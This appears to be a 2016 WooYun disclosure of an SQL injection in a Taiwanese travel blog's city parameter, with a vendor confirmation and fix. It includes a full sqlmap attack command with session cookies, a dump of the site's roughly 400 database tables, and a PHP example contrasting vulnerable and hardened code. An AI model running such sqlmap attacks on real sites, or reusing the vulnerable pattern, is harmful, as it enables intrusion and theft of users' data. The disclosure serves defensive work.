
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0166981

Title: SQL injection vulnerability in a Via`s旅行札記 site (280,000 email records leaked) (Taiwan region)

Affected vendor: Via`s旅行札記

Author: Xmyth_夏洛克

Submitted: 2016-01-03 12:22

Fixed: 2016-01-12 15:41

Disclosed: 2016-01-12 15:41

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner (HITCON Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-01-03: Details sent to the vendor, awaiting vendor handling
2016-01-04: Vendor confirmed; details visible to the vendor only
2016-01-12: Vendor fixed the vulnerability and disclosed it voluntarily; details made public

Summary:

As per the title.

Details:

URL with SQL injection:
http://**.**.**.**/agoda/city_hotels.php?city=taipei

[Screenshot: 图片.png]


The city parameter is injectable; a single quote triggers a database error.

[Screenshot: 报错.png]


Fed to sqlmap:

sqlmap.py -u "http://**.**.**.**/agoda/city_hotels.php?city=taipei"  --cookie="_ga=GA1.2.584452688.1449899997; __auc=6d2d15a715194c6a3ffdf53d737; __utma=138364462.1515349163.1449903864.1449903864.1449903864.1; __utmz=138364462.1449903864.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=jl7cpm9p2deub21s48n01s8t45"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"


[Screenshot: city.jpg]

Proof of vulnerability:

Two databases

[Screenshot: 两个库.jpg]


Database: viablog
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ip_count | 1591785 |
| ip_count201512 | 906112 |
| ip_count201509 | 718503 |
| ip_count201508 | 711875 |
| ip_count201506 | 682587 |
| ip_count201511 | 665705 |
| ip_count201505 | 663826 |
| ip_count201507 | 663226 |
| ip_count201510 | 635273 |
| ip_count201504 | 488446 |
| ip_count201503 | 477996 |
| ip_count201501 | 420908 |
| ip_count201502 | 408522 |
| ip_count201411 | 396811 |
| ip_count201412 | 369118 |
| ip_m_count201512 | 308741 |
| w_blog_mailto | 279021 |
| ip_count201408 | 275720 |
| ip_m_count201508 | 263351 |
| ip_m_count201509 | 252517 |
| ip_count201409 | 246778 |
| ip_count201410 | 245617 |
| ip_m_count201510 | 244103 |
| ip_count201407 | 243986 |
| ip_m_count201511 | 228868 |
| ip_m_count201507 | 223172 |
| ip_count201405 | 213236 |
| ip_count201406 | 209987 |
| ip_m_count201506 | 192599 |
| ip_m_count201505 | 188117 |
| w_push_blog | 158727 |
| ip_count201404 | 154298 |
| ip_m_count201407 | 151578 |
| ip_m_count201408 | 138165 |
| ip_count201403 | 133589 |
| ip_m_count201406 | 131886 |
| ip_count201402 | 126336 |
| ip_m_count201405 | 121928 |
| ip_m_count201403 | 114490 |
| ip_count201312 | 113413 |
| ip_count201401 | 112315 |
| ip_count201311 | 108745 |
| m_search201511 | 102152 |
| ip_count201310 | 101979 |
| ip_count201309 | 100370 |
| m_search201507 | 99263 |
| ip_m_count201404 | 98927 |
| m_search201512 | 98226 |
| ip_m_count201402 | 98036 |
| m_search201508 | 94185 |
| m_search201510 | 93443 |
| ip_m_count201401 | 89864 |
| ip_count201601 | 81673 |
| ip_m_count201311 | 80196 |
| m_search201509 | 78082 |
| ip_m_count201312 | 75818 |
| ip_m_count201310 | 72151 |
| ip_m_count201309 | 72063 |
| ip_count201308 | 49619 |
| w_counterrecord | 45439 |
| dt_search201512 | 38170 |
| dt_search201511 | 33200 |
| dt_search201507 | 32967 |
| dt_search201508 | 32795 |
| dt_search201510 | 28802 |
| ip_m_count201601 | 27500 |
| dt_search201509 | 25762 |
| w_club_todaycount | 18921 |
| ip_count201005 | 18400 |
| m_search201601 | 17163 |
| ip_count201111 | 16689 |
| ip_count201109 | 15813 |
| w_blog_board | 15809 |
| ip_count201003 | 15732 |
| ip_count201010 | 14951 |
| ip_count201112 | 14626 |
| ip_count201006 | 14555 |
| ip_count201004 | 14410 |
| ip_count201008 | 14329 |
| ip_count201007 | 13684 |
| ip_count201108 | 13610 |
| ip_count201011 | 13486 |
| ip_count201107 | 12988 |
| ip_count201012 | 12524 |
| ip_count201106 | 12411 |
| w_blog_extend | 12262 |
| ip_count201212 | 12205 |
| ip_count201002 | 11873 |
| ip_count201201 | 11394 |
| ip_count201105 | 11329 |
| ip_count201009 | 11172 |
| m_search201506 | 10432 |
| ip_count201204 | 10200 |
| ip_count201205 | 10167 |
| ip_count201202 | 9789 |
| ip_count201203 | 9665 |
| ip_count201206 | 8541 |
| ip_count201301 | 8196 |
| ip_count201104 | 8157 |
| ip_count201304 | 7957 |
| ip_count201110 | 7808 |
| ip_count201305 | 7730 |
| ip_count201303 | 7642 |
| blog_myfriendlog | 7477 |
| w_guestbook | 7421 |
| ip_count201302 | 7352 |
| ip_count201211 | 7197 |
| ip_count201210 | 6607 |
| dt_search201506 | 6598 |
| w_text_vote_sum | 6551 |
| ip_count201307 | 5979 |
| ip_m_count201504 | 5971 |
| ip_count201306 | 5630 |
| w_text_vote_record | 4451 |
| w_text_vote_sum2 | 4428 |
| room_class | 3375 |
| dt_search201601 | 3003 |
| w_blog_myfriend | 2425 |
| w_bloglist | 2082 |
| ip_m_count201308 | 2064 |
| room_class_2015bak | 1989 |
| w_bloglist_mobile | 1905 |
| w_bloglist_2015bak | 1897 |
| w_text_push_blog | 1795 |
| w_product_attrib | 1222 |
| w_hotels_todaycount | 877 |
| w_mobile_todaycount | 865 |
| w_county_h | 711 |
| w_member | 559 |
| w_bookmark | 556 |
| news | 443 |
| w_hotel_map_todaycount | 433 |
| w_maps_todaycount | 433 |
| w_ordertitles | 401 |
| w_county_h2 | 371 |
| postal_zone | 337 |
| w_adver | 335 |
| gallery_images | 329 |
| w_product_board | 308 |
| w_product | 303 |
| w_ordermain | 268 |
| syslog201412 | 257 |
| syslog201507 | 232 |
| syslog201308 | 225 |
| syslog201503 | 219 |
| syslog201311 | 188 |
| syslog201408 | 186 |
| syslog201409 | 183 |
| syslog201309 | 181 |
| syslog201312 | 176 |
| syslog201404 | 174 |
| syslog201410 | 172 |
| syslog201504 | 170 |
| syslog201401 | 169 |
| syslog201505 | 165 |
| syslog201511 | 163 |
| syslog201506 | 162 |
| syslog201407 | 155 |
| syslog201501 | 151 |
| syslog201509 | 149 |
| syslog201402 | 132 |
| syslog201403 | 132 |
| syslog201411 | 129 |
| syslog201310 | 128 |
| syslog201502 | 126 |
| syslog201406 | 125 |
| syslog201510 | 123 |
| weblog201506 | 121 |
| w_contact | 117 |
| syslog201512 | 108 |
| syslog201405 | 107 |
| w_adver2 | 97 |
| syslog201508 | 90 |
| w_blogcategory | 75 |
| w_blogcategory_mobile | 75 |
| w_category | 66 |
| w_agoda_city | 63 |
| w_blogcategory_agoda | 63 |
| w_service_list | 62 |
| w_active | 57 |
| w_bloglist_agoda | 54 |
| B2_pro | 52 |
| w_myfriend_text | 52 |
| w_bookmark_city | 48 |
| country | 47 |
| L2 | 44 |
| w_blog_bulletin | 41 |
| w_bookmark2_city | 34 |
| w_upload_image | 33 |
| w_class | 32 |
| w_system | 31 |
| weblog201007 | 29 |
| weblog201005 | 28 |
| website_config | 27 |
| ip_m_count201411 | 26 |
| bulletin | 24 |
| photo_class | 24 |
| w_job | 24 |
| w_link | 24 |
| w_favorite | 23 |
| weblog201002 | 23 |
| C2 | 22 |
| ip_m_count201412 | 22 |
| shopping_item | 22 |
| w_pay | 20 |
| weblog201004 | 19 |
| w_mobile_config | 18 |
| w_travel_club | 18 |
| w_web_config | 18 |
| L1 | 17 |
| L1_pro | 17 |
| L2_pro | 17 |
| w_payment | 17 |
| w_travel_content | 17 |
| weblog201012 | 17 |
| C1 | 16 |
| w_top_product | 16 |
| w_system_85inn | 15 |
| syslog201601 | 14 |
| weblog201111 | 14 |
| weblog201206 | 14 |
| weblog201508 | 13 |
| weblog201011 | 12 |
| weblog201201 | 12 |
| B1_pro | 11 |
| w_bookmark_board | 11 |
| weblog201001 | 11 |
| weblog201404 | 11 |
| w_forum_board | 10 |
| w_qa_list | 10 |
| w_travel_club_holiday | 10 |
| w_web_service | 10 |
| weblog201003 | 10 |
| weblog201010 | 10 |
| weblog201405 | 10 |
| club_shop_explain | 9 |
| w_forum_board_re | 9 |
| weblog201008 | 9 |
| w_company | 8 |
| weblog201105 | 8 |
| weblog201106 | 8 |
| weblog201107 | 8 |
| weblog201302 | 8 |
| weblog201403 | 8 |
| weblog201108 | 7 |
| weblog201212 | 7 |
| weblog201501 | 7 |
| w_agreement | 6 |
| w_edu | 6 |
| w_income | 6 |
| w_order_agreement | 6 |
| w_shop_explain | 6 |
| w_theme | 6 |
| weblog201210 | 6 |
| news_bar | 5 |
| w_adver_m | 5 |
| w_blogcategory2 | 5 |
| w_product_explain | 5 |
| w_qa | 5 |
| w_shop_pay | 5 |
| w_shop_return | 5 |
| weblog201102 | 5 |
| weblog201112 | 5 |
| weblog201205 | 5 |
| weblog201209 | 5 |
| weblog201211 | 5 |
| weblog201306 | 5 |
| weblog201308 | 5 |
| weblog201402 | 5 |
| weblog201411 | 5 |
| emp_info | 4 |
| w_auth | 4 |
| w_carrer | 4 |
| w_shop_freightage | 4 |
| w_shop_privacy | 4 |
| weblog201104 | 4 |
| weblog201202 | 4 |
| weblog201207 | 4 |
| weblog201303 | 4 |
| weblog201305 | 4 |
| weblog201307 | 4 |
| weblog201311 | 4 |
| weblog201503 | 4 |
| weblog201505 | 4 |
| syslog201302 | 3 |
| w_paynow_payment | 3 |
| w_top_todaycount | 3 |
| weblog201006 | 3 |
| weblog201101 | 3 |
| weblog201110 | 3 |
| weblog201203 | 3 |
| weblog201301 | 3 |
| weblog201304 | 3 |
| weblog201310 | 3 |
| weblog201401 | 3 |
| weblog201408 | 3 |
| weblog201409 | 3 |
| weblog201410 | 3 |
| weblog201504 | 3 |
| syslog201002 | 2 |
| w_album_board | 2 |
| weblog201309 | 2 |
| weblog201312 | 2 |
| weblog201406 | 2 |
| club_shop_explain2 | 1 |
| syslog201001 | 1 |
| syslog201003 | 1 |
| syslog201004 | 1 |
| syslog201005 | 1 |
| syslog201006 | 1 |
| syslog201007 | 1 |
| syslog201008 | 1 |
| syslog201009 | 1 |
| syslog201010 | 1 |
| syslog201011 | 1 |
| syslog201012 | 1 |
| syslog201101 | 1 |
| syslog201102 | 1 |
| syslog201103 | 1 |
| syslog201104 | 1 |
| syslog201105 | 1 |
| syslog201106 | 1 |
| syslog201107 | 1 |
| syslog201108 | 1 |
| syslog201109 | 1 |
| syslog201110 | 1 |
| syslog201111 | 1 |
| syslog201112 | 1 |
| syslog201201 | 1 |
| syslog201202 | 1 |
| syslog201203 | 1 |
| syslog201204 | 1 |
| syslog201205 | 1 |
| syslog201206 | 1 |
| syslog201207 | 1 |
| syslog201208 | 1 |
| syslog201209 | 1 |
| syslog201210 | 1 |
| syslog201211 | 1 |
| syslog201212 | 1 |
| syslog201301 | 1 |
| syslog201303 | 1 |
| syslog201304 | 1 |
| syslog201305 | 1 |
| syslog201306 | 1 |
| syslog201307 | 1 |
| w_agoda_config | 1 |
| w_auth_passwd | 1 |
| w_pcount | 1 |
| w_users | 1 |
| weblog201009 | 1 |
| weblog201204 | 1 |
| weblog201208 | 1 |
| weblog201407 | 1 |
| weblog201510 | 1 |
| weblog201512 | 1 |
+------------------------+---------+
400 tables, millions of rows, including 280,000 email records

[Screenshot: 邮件.png]

Suggested fix:

Filter special characters in the parameter.
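The report only describes the root cause (a request value that reaches the SQL text, so a stray quote breaks the query) and the one-line fix. The following is an added example written for this page, not code from the site or the reporter: it shows the concatenation pattern that produces the visible error next to a hardened version that validates the value and binds it as a parameter, and keeps the driver's error message off the response. The table name `w_agoda_city` is taken from the sqlmap listing above; its columns (`city_slug`, `hotel_name`, `price`), the DSN and the credentials are assumptions and placeholders.

```php
<?php
// Added example, not the site's code. Assumes a MySQL table `w_agoda_city`
// (name from the sqlmap table list) with hypothetical columns `city_slug`,
// `hotel_name`, `price`. DSN and credentials are placeholders.

declare(strict_types=1);

// Vulnerable pattern: the request value is concatenated into the SQL string,
// so a single quote in ?city= changes the statement and produces the database
// error the report describes.
function listHotelsVulnerable(PDO $pdo, string $city): array
{
    $sql = "SELECT hotel_name, price FROM w_agoda_city WHERE city_slug = '" . $city . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: check the shape of the value first, then bind it as a
// parameter so the server never interprets it as SQL.
function listHotelsSafe(PDO $pdo, string $city): array
{
    // City slugs on this endpoint look like "taipei": lowercase letters, digits, hyphen.
    if (!preg_match('/^[a-z0-9-]{1,64}$/', $city)) {
        throw new InvalidArgumentException('invalid city parameter');
    }
    $stmt = $pdo->prepare('SELECT hotel_name, price FROM w_agoda_city WHERE city_slug = :city');
    $stmt->execute([':city' => $city]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection setup: real server-side prepares (no client-side emulation) and
// exceptions instead of silent false returns.
$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=viablog;charset=utf8mb4', // placeholder DSN
    'app_user',                                            // placeholder user
    'app_password',                                        // placeholder password
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$city = $_GET['city'] ?? '';
try {
    $rows = listHotelsSafe($pdo, $city);
    header('Content-Type: application/json');
    echo json_encode($rows);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('bad request');
} catch (PDOException $e) {
    // Log server-side only. Echoing the driver message to the client is what
    // made the injection point visible in the first place.
    error_log($e->getMessage());
    http_response_code(500);
    exit('internal error');
}
```

The allowlist check is what the page's "filter special characters" advice amounts to in practice; the prepared statement is the control that actually closes the injection, since it holds even when a value legitimately needs a quote. Disabling emulated prepares matters because with emulation PDO builds the SQL string client-side, which depends on the connection charset being set correctly (hence `charset=utf8mb4` in the DSN).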

Copyright notice: when reposting, credit the source Xmyth_夏洛克@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2016-01-04 13:22

Vendor reply:

Thanks for the report.

Latest status:

2016-01-12: Fixed